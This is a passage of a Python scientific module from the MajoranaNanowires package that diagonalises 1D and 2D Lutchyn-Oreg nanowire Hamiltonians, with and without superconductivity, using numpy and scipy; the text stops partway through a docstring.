e81c436269fa160d42c689927d4427bb780373d2 | 80,080 | py | Python | MajoranaNanowires/H_class/Lutchyn_Oreg/solvers.py | Samdaz/MajoranaNanowires | d411b918ac0638fc3bf0441ced6e1e2ba7f3b4fb | [
"MIT"
] | 2 | 2020-08-10T07:06:15.000Z | 2022-02-22T10:46:30.000Z | MajoranaNanowires/H_class/Lutchyn_Oreg/solvers.py | Samdaz/MajoranaNanowires | d411b918ac0638fc3bf0441ced6e1e2ba7f3b4fb | [
"MIT"
] | null | null | null | MajoranaNanowires/H_class/Lutchyn_Oreg/solvers.py | Samdaz/MajoranaNanowires | d411b918ac0638fc3bf0441ced6e1e2ba7f3b4fb | [
"MIT"
] | 2 | 2021-09-29T02:54:36.000Z | 2022-03-29T22:52:46.000Z |
'''
###############################################################################
"MajoranaNanowire" Python3 Module
v 1.0 (2020)
Created by Samuel D. Escribano (2018)
###############################################################################
"H_class/Lutchyn_Oreg/builders" submodule
This sub-package solves Lutchyn-Oreg Hamiltonians.
###############################################################################
'''
#%%############################################################################
######################## Required Packages ############################
###############################################################################
import numpy as np
import scipy.sparse
import scipy.sparse.linalg
import scipy.linalg
import scipy.constants as cons
from MajoranaNanowires.Functions import order_eig, diagonal
from MajoranaNanowires.Functions import H_rec2shape, U_shape2rec
#%%
def LO_1D_solver(H,N,dis,
mu=0,B=0,aR=0,d=0,
space='position',k_vec=0,
sparse='no',n_eig=None,near=None):
"""
1D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 1D Lutchy-Oreg chain with superconductivity.
Parameters
----------
H: arr
Discretized 1D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: int
Number of sites.
dis: int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 1D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 2D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site superconductivity. If it is float, the SC pairing amplitude
is the same in every site, while if it is a 1D array, it is the
on-site superconductivity.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Make sure that some parameters are arrays:
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones(N)
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRy=np.zeros(N)
aRz=aR*np.ones(N)/(2*dis)
elif np.ndim(aR)==1:
if len(aR)==3:
aRy=aR[1]*np.ones(N)/(2*dis)
aRz=aR[2]*np.ones(N)/(2*dis)
else:
aRy=np.zeros(N)
aRz=aR/(2*dis)
else:
aRy=aR[1]/(2*dis)
aRz=aR[2]/(2*dis)
if np.isscalar(d):
d = d * np.ones(N)
if space=='position' or space=='position2momentum':
n_k=len(k_vec)
#Store matrices:
if n_eig==None:
n_eig=4*N
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([4*N,int(n_eig)],dtype=complex)
elif space=='momentum' or space=='position2momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([4*N,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((4*N,4*N),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H)
H_add=scipy.sparse.dok_matrix((4*N,4*N),dtype=complex)
#Obtain the add-values Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
for i in range(2):
H_add[diagonal(2*N*(i+1),init=2*N*i)] = (-1)**i*(np.repeat(e,2))
if not(np.isscalar(B) and B==0):
Bz = np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
for i in range(2):
H_add[diagonal(2*N*(i+1),init=2*N*i,k=1,step=2)], H_add[diagonal(2*N*(i+1),init=2*N*i,k=-1,step=2)] = (-1)**(i)*Bx-1j*By, (-1)**(i)*Bx+1j*By
H_add[diagonal(2*N*(i+1),init=2*N*i)] += (-1)**i*Bz
if not((aRy==0).all() and (aRz==0).all()):
aRy = np.repeat(aRy,2)
aRy[1::2] = -aRy[::2]
for i in range(2):
H_add[diagonal(2*N*(i+1),init=2*N*i,k=-2)]= +1j*aRy[2::]
H_add[diagonal(2*N*(i+1),init=2*N*i,k=2)] = -1j*aRy[2::]
H_add[diagonal(2*N*(i+1),k=1,step=2,init=1+2*N*i)] += -1*(-1)**i*aRz[1::]
H_add[diagonal(2*N*(i+1),k=-1,step=2,init=1+2*N*i)] += -1*(-1)**i*aRz[1::]
H_add[diagonal(2*N*(i+1),init=2*N*i,k=3,step=2)] += (-1)**i*aRz[1::]
H_add[diagonal(2*N*(i+1),init=2*N*i,k=-3,step=2)] += (-1)**i*aRz[1::]
if not(np.isscalar(d)):
d=d.flatten()
H_add[diagonal(4*N,k=2*N+1,step=2)], H_add[diagonal(4*N,k=-2*N-1,step=2)] = -np.conj(d), -d
H_add[diagonal(4*N,k=2*N-1,step=2,init=1)], H_add[diagonal(4*N,k=-2*N+1,step=2,init=1)] = np.conj(d), d
#Diagonalize the Hamiltonian:
if sparse=='no':
if space=='position':
E[0:2 * N], U[0:4 * N, 0:2 * N] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(2*N,4*N-1))
E[2*N:4*N]=-E[0:2*N]
U[0:2 * N, 2 * N:4 * N] = U[2 * N:4 * N, 0:2 * N]
U[2 * N:4 * N, 2 * N:4 * N] = U[0:2 * N, 0:2 * N]
E,U=order_eig(E,U,sparse='no')
elif space=='momentum':
for i in range(n_k):
H_add[2 * (N - 1):2 * (N - 1) + 2, 0: 2] = np.array([[-1j*aRy[2], aRz[1]], [-aRz[1], +1j*aRy[2]]])*np.exp(-1j*k_vec[i]*N)
H_add[2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N, 2*N: 2+2*N] = -np.array([[+1j*aRy[2], aRz[1]], [-aRz[1], -1j*aRy[2]]])*np.exp(1j*k_vec[i]*N)
H_add[0: 2, 2 * (N - 1):2 * (N - 1) + 2] = np.array([[+1j*aRy[2], -aRz[1]], [aRz[1], -1j*aRy[2]]])*np.exp(1j*k_vec[i]*N)
H_add[2*N: 2+2*N, 2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N] = -np.array([[-1j*aRy[2], -aRz[1]], [aRz[1], +1j*aRy[2]]])*np.exp(-1j*k_vec[i]*N)
E[0:2 * N,i], U[0:4 * N, 0:2 * N,i] = scipy.linalg.eigh(H[:,:,i]+H_add, lower=False,eigvals=(2*N,4*N-1))
E[2*N:4*N,i]=-E[0:2*N,i]
U[0:2 * N, 2 * N:4 * N,i] = U[2 * N:4 * N, 0:2 * N,i]
U[2 * N:4 * N, 2 * N:4 * N,i] = U[0:2 * N, 0:2 * N,i]
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
else:
if space=='position':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig,sigma=0, which='LM',tol=1e-5)
E,U=order_eig(E,U,sparse='yes')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((4*N,4*N),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
H_k[0: 2, 2 * (N - 1):2 * (N - 1) + 2] += H_k[2:4, 0: 2]*np.exp(-1j*k_vec[i]*N)
H_k[2 * (N - 1):2 * (N - 1) + 2, 0: 2] += H_k[0:2,2:4]*np.exp(1j*k_vec[i]*N)
H_k[2*N: 2+2*N, 2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N] = -(np.conj(H_k[0: 2, 2 * (N - 1):2 * (N - 1) + 2]))
H_k[2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N, 2*N: 2+2*N] = -(np.conj(H_k[2 * (N - 1):2 * (N - 1) + 2, 0: 2]))
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes')
#Return the eigenspectra:
return (E), (U)
#%%
def LO_1D_solver_NoSC(H,N,dis,
mu=0,B=0,aR=0,
space='position',k_vec=0,
sparse='no',n_eig=None,near=None):
"""
1D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 1D Lutchy-Oreg chain without superconductivity.
Parameters
----------
H: arr
Discretized 1D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: int
Number of sites.
dis: int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 1D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 2D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Make sure that the onsite parameters are arrays: if np.isscalar(mu):
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones(N)
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRy=np.zeros(N)
aRz=aR*np.ones(N)/(2*dis)
elif np.ndim(aR)==1:
if len(aR)==3:
aRy=aR[1]*np.ones(N)/(2*dis)
aRz=aR[2]*np.ones(N)/(2*dis)
else:
aRy=np.zeros(N)
aRz=aR/(2*dis)
else:
aRy=aR[1]/(2*dis)
aRz=aR[2]/(2*dis)
if space=='position' or space=='position2momentum':
n_k=len(k_vec)
#Store matrices:
if n_eig==None:
n_eig=2*N
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([2*N,int(n_eig)],dtype=complex)
elif space=='momentum' or space=='position2momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([2*N,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((2*N,2*N),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H)
H_add=scipy.sparse.dok_matrix((2*N,2*N),dtype=complex)
#Obtain the add-values Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
H_add[diagonal(2*N)]=np.repeat(e,2)
if not(np.isscalar(B) and B==0):
Bz,Bx,By=np.repeat(Bz,2),np.repeat(Bx,2), 1j*np.repeat(By,2)
Bx[1::2], By[1::2], Bz[1::2] = 0, 0, -Bz[::2]
H_add[diagonal(2*N,k=1)], H_add[diagonal(2*N,k=-1)] = Bx[:-1]-By[:-1], Bx[:-1]+By[:-1]
H_add[diagonal(2*N)]+=Bz
if not((aRy==0).all() and (aRz==0).all()):
aRy=-1j*np.repeat(aRy,2)
aRy[1::2]= -aRy[::2]
H_add[diagonal(2*N,k=-2)], H_add[diagonal(2*N,k=2)] = -aRy[2::], aRy[2::]
H_add[diagonal(2*N,k=1,step=2,init=1)] += -aRz[1::]
H_add[diagonal(2*N,k=-1,step=2,init=1)] += -aRz[1::]
H_add[diagonal(2*N,k=3,step=2)] += aRz[1::]
H_add[diagonal(2*N,k=-3,step=2)] += aRz[1::]
#Diagonalize the Hamiltonian:
if sparse=='no':
if space=='position':
E, U= scipy.linalg.eigh(H+H_add, lower=False)
E,U=order_eig(E,U,sparse='no')
elif space=='momentum':
for i in range(n_k):
H_add[2 * (N - 1):2 * (N - 1) + 2, 0: 2] = np.array([[-1j*aRy[2], aRz[1]], [-aRz[1], +1j*aRy[2]]])*np.exp(-1j*k_vec[i]*N)
H_add[0: 2, 2 * (N - 1):2 * (N - 1) + 2] = np.array([[+1j*aRy[2], -aRz[1]], [aRz[1], -1j*aRy[2]]])*np.exp(1j*k_vec[i]*N)
E[:,i], U[:,:,i] = scipy.linalg.eigh(H[:,:,i]+H_add, lower=False)
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
else:
if space=='position':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='SA',tol=1e-5)
E,U=order_eig(E,U,sparse='yes',BdG='no')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((2*N,2*N),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
H_k[0: 2, 2 * (N - 1):2 * (N - 1) + 2] += H_k[2:4, 0: 2]*np.exp(-1j*k_vec[i]*N)
H_k[2 * (N - 1):2 * (N - 1) + 2, 0: 2] += H_k[0:2,2:4]*np.exp(1j*k_vec[i]*N)
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes',BdG='no')
return (E), (U)
#%%
def LO_2D_solver(H,N,dis,m_eff=0.023,
mu=0,B=0,aR=0,d=0,
space='position',k_vec=0,
sparse='yes',n_eig=None,near=None,
section='rectangular'):
"""
2D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 2D Lutchy-Oreg chain with superconductivity.
Parameters
----------
H: arr
Discretized 1D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: arr or int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 2D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 2D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site superconductivity. If it is float, the SC pairing amplitude
is the same in every site, while if it is a 2D array, it is the
on-site superconductivity.
dic: numpy array
Whether to re-use the dictionary of sites of other process or not.
space: {"position","momentum","position2momentum"}
Space in which the Hamiltonian is built. "position" means
real-space (r-space). In this case the boundary conditions are open.
On the other hand, "momentum" means reciprocal space (k-space). In
this case the built Hamiltonian corresponds to the Hamiltonian of
the unit cell, with periodic boundary conditions along the
x-direction. "position2momentum" means that the Hamiltonian is
built in real space, but you want to diagonalize it in momentum
space (so in each step is converted to a momentum space).This
option is recommended for large matrices.
k_vec: arr
If space=='momentum' or "position2momentum", k_vec is the
(discretized) momentum vector, usually in the First Brillouin Zone.
sparse: {"yes","no"}
Sparsety of the built Hamiltonian. "yes" builds a dok_sparse matrix,
while "no" builds a dense matrix.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
near: float
If sparse=="yes" and BdG=='no', near provides the value around to
which the eigenvalues must be found.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
Rashba={"Full-Rashba","kx-terms"}
Whether include all the terms of the Rashba coupling (Full-Rashba)
or include only those terms proportional to kx (kx-terms).
Returns
-------
E: arr (n_eig x n)
Eigevalues (energies), ordered from smaller to larger.
U: arr ((2 x N) x n_eig x n)
Eigenvectors of the system with the same ordering.
"""
#Obtain the dimensions:
Ny, Nz = N[0], N[1]
if np.ndim(dis)==0:
dis_y, dis_z = dis, dis
else:
dis_y, dis_z = dis[0], dis[1]
m = int(4 * Ny * Nz)
if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
m_hex=H_rec2shape(0,section,N,dis,BdG='yes',output='m')
if (space=='momentum'):
n_k=len(k_vec)
if sparse=='no':
n_eig=m
#Make sure that the onsite parameters are arrays:
if space=='momentum':
if np.isscalar(m_eff):
m_eff = m_eff * np.ones((Ny,Nz))
m_eff=m_eff.flatten()
if np.isscalar(mu) and not(mu==0):
mu = mu * np.ones((Ny,Nz))
if np.isscalar(B) and not(B==0):
Bx=B
By=0
Bz=0
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
elif np.ndim(B)==1:
Bx=B[0]
By=B[1]
Bz=B[2]
Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
if np.ndim(aR)==0:
aRx=np.zeros(N)
aRy=np.zeros(N)
aRz=aR*np.ones(N)
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones(N)
aRy=aR[1]*np.ones(N)
aRz=aR[2]*np.ones(N)
else:
aRx=np.zeros(N)
aRy=np.zeros(N)
aRz=aR*np.ones(N)
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
if np.isscalar(d) and not(d==0):
d = d * np.ones(N)
#Store matrices:
if space=='position':
E = np.empty([int(n_eig)])
U = np.empty([m,int(n_eig)],dtype=complex)
elif space=='momentum':
E = np.empty([int(n_eig),n_k])
U = np.empty([m,int(n_eig),n_k],dtype=complex)
if sparse=='no':
H_add=np.zeros((m,m),dtype=complex)
else:
if not(scipy.sparse.issparse(H)):
H = scipy.sparse.dok_matrix(H,dtype=complex)
H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)
#Obtain the add-values Hamiltonian:
if not(np.isscalar(mu)):
e=-mu
e=e.flatten()
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] = (-1)**(i)*(np.repeat(e,2))
if not(np.isscalar(B) and B==0):
Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
Bz=np.repeat(Bz,2)
Bz[1::2] = -Bz[::2]
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1,step=2)], H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1,step=2)] = (-1)**(i)*Bx-1j*By, (-1)**(i)*Bx+1j*By
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] += (-1)**(i)*(Bz)
if not((aRx==0).all() and (aRy==0).all() and (aRz==0).all()):
aRx_ky, aRz_ky = np.repeat(((aRx[1::,:]+aRx[:-1,:])/(4*dis_y)).flatten(),2), ((aRz[1::,:]+aRz[:-1,:])/(4*dis_y)).flatten()
aRx_kz, aRy_kz = ((aRx[:,1::]+aRx[:,:-1])/(4*dis_z)).flatten(), ((aRy[:,1::]+aRy[:,:-1])/(4*dis_z)).flatten()
aRx_ky[1::2] = -aRx_ky[::2]
aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1)))
for i in range(2):
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=2*Nz)] = 1j*aRx_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-2*Nz)] = -1j*aRx_ky
H_add[diagonal(int(m/2)*(i+1),k=2*Nz-1,step=2,init=1+int(m/2)*i)] += -1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),k=-2*Nz+1,step=2,init=1+int(m/2)*i)] += 1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1+2*Nz,step=2)] += -1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1-2*Nz,step=2)] += 1j*aRz_ky
H_add[diagonal(int(m/2)*(i+1),k=1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz+1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),k=-1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz-1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=3,step=2)] += -1*(-1)**(i)*aRx_kz+1j*aRy_kz
H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-3,step=2)] += -1*(-1)**(i)*aRx_kz-1j*aRy_kz
if not(np.isscalar(d)):
d=d.flatten()
H_add[diagonal(m,k=int(m/2)+1,step=2)], H_add[diagonal(m,k=-int(m/2)-1,step=2)] = -np.conj(d), -d
H_add[diagonal(m,k=int(m/2)-1,step=2,init=1)], H_add[diagonal(m,k=-int(m/2)+1,step=2,init=1)] = np.conj(d), d
#Diagonalize the Hamiltonian:
if sparse=='no':
#####revisar
if space=='position':
E[0:int(m/2)], U[0:m, 0:int(m/2)] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(2*N,4*N-1))
E[int(m/2):m]=-E[0:int(m/2)]
U[0:int(m/2), int(m/2):m] = U[int(m/2):m, 0:int(m/2)]
U[int(m/2):m, int(m/2):m] = U[0:int(m/2), 0:int(m/2)]
E,U=order_eig(E,U,sparse='no')
elif space=='momentum':
aRy, aRz = aRy.flatten(), aRz.flatten()
aRy=np.repeat(aRy,2)
aRy[1::2] = -aRy[::2]
for i in range(n_k):
for j in range(2):
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += (-1)**(j)*np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += -1*aRy*k_vec[i]
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=1,step=2)] += -1j*(-1)**(j)*aRz*k_vec[i]
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-1,step=2)] += 1j*(-1)**(j)*aRz*k_vec[i]
E[0:int(m/2),i], U[0:m, 0:int(m/2),i] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(2*N,4*N-1))
E[int(m/2):m,i]=-E[0:int(m/2),i]
U[0:int(m/2), int(m/2):m,i] = U[int(m/2):m, 0:int(m/2),i]
U[int(m/2):m, int(m/2):m,i] = U[0:int(m/2), 0:int(m/2),i]
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
for j in range(2):
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] -= (-1)**(j)*np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] -= -1*aRy*k_vec[i]
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=1,step=2)] -= -1j*(-1)**(j)*aRz*k_vec[i]
H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-1,step=2)] -= 1j*(-1)**(j)*aRz*k_vec[i]
#####
else:
if space=='position':
if np.isscalar(section) and section=='rectangular':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig,sigma=0, which='LM',tol=1e-4)
E, U=order_eig(E, U,sparse='yes')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='yes',output='H',m=m_hex)
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='LM',sigma=0,tol=1e-9)
E,U_hex=order_eig(E,U_hex,sparse='yes',BdG='yes')
U=U_shape2rec(U_hex,section,N,dis,BdG='yes')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
aRy, aRz = aRy.flatten(), aRz.flatten()
aRy=np.repeat(aRy,2)
aRy[1::2] = -aRy[::2]
for i in range(n_k):
H_k = (H+H_add).copy()
for j in range(2):
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += (-1)**(j)*np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += -1*aRy*k_vec[i]
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=1,step=2)] += -1j*(-1)**(j)*aRz*k_vec[i]
H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-1,step=2)] += 1j*(-1)**(j)*aRz*k_vec[i]
if np.isscalar(section) and section=='rectangular':
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes')
else:
H_k=H_rec2shape(H_k,section,N,dis,BdG='yes',output='H',m=m_hex)
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='LM',sigma=0,tol=1e-9)
E[:,i],U_hex=order_eig(E[:,i],U_hex,sparse='yes',BdG='yes')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='yes')
return (E), (U)
#%%
def LO_2D_solver_NoSC(H,N,dis,m_eff=0.023,
mu=0,B=0,aR=0,
space='position',k_vec=0,
sparse='yes',n_eig=None,near=None,
section='rectangular'):
"""
2D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 2D Lutchy-Oreg chain with superconductivity.
Parameters
----------
H: arr
Discretized 2D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
Distance (in nm) between sites.
m_eff: int
Effective mass.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 2D array, it is the
on-site chemical potential.
B: float or arr
Zeeman splitting.
-If B is a float, the same constant B is added in the x direction
in each site and in every diagonalization step.
-If B is a 1D array of length=3, each element of the array is the
(constant) Zeeman splitting in each direction, which is added in
every diagonalization step.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
dic: numpy array
Whether to re-use the dictionary of sites of other process or not.
SC: {}
If the dictionary is not empty, a Superconductor Hamiltonian is
